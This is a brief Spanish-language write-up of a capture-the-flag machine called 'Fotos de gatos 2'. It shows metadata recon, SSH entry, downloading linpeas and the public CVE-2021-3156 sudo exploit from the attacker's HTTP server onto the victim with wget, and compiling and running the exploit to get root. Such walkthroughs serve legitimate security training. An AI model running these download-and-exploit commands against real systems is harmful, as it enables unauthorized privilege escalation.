Fotos de gatos 2 (exiftool)

❯ exiftool img.jpg

Encontramos un directorio:

Podemos ejecutar comandos por la interfaz:

Intentamos abrir el .ssh

Entramos por ssh:

Subimos linpeas:

wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas_linux_amd64

python3 -m http.server

Maquina victima:

wget http://10.9.2.148:8000/linpeas_linux_amd64

Se encontro un sudo desactualizado:

sudo --version

git clone https://github.com/blasty/CVE-2021-3156

tar -cvf exploit.tar CVE-2021-3156

python3 -m http.server

Maquina victima:

cd /tmp

wget http://10.17.54.133:8000/exploit.tar

tar xopf exploit.tar

make
./sudo-hax-me-a-sandwich
./sudo-hax-me-a-sandwich 0

Y tenemos root señores

Last updated 11 months ago